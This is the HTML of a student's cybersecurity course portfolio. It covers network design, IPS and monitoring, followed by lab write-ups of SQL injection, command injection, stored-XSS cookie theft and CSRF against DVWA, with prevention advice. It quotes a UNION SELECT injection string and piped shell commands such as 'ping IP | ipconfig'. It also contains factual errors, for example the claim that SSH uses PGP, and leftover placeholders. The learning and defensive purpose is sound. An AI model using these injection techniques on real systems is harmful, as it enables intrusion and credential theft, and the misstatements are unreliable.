          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
